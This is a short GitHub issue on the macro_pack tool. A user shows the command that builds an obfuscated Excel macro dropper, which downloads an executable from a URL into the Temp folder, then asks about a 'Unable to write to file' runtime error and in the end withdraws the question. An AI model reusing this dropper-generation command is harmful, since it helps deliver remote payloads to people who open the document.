sevagas/macro_pack

Error 3004 when opening the generated file

madblixt opened this issue · 1 comments

Hi,

I generate a dropper with the command:

echo https://example.com/test.exe "%Temp%" | C:\Users\33604\Downloads\macro_pack.exe -t DROPPER -o -G dropper_test.xls

When I open the document locally to test it I get an error:

Runtime error: 3004 
Unable to write to file

When I click on debug I have this line highlighted:

agtdvojgoznxgje.SaveToFile rmvmhxaieq, 2

image

Apparently it fails from here, I changed the download path several times but I get the same error

I have neither anti-virus nor firewall activated

Am I doing something wrong?

I'm so dumb, forget about it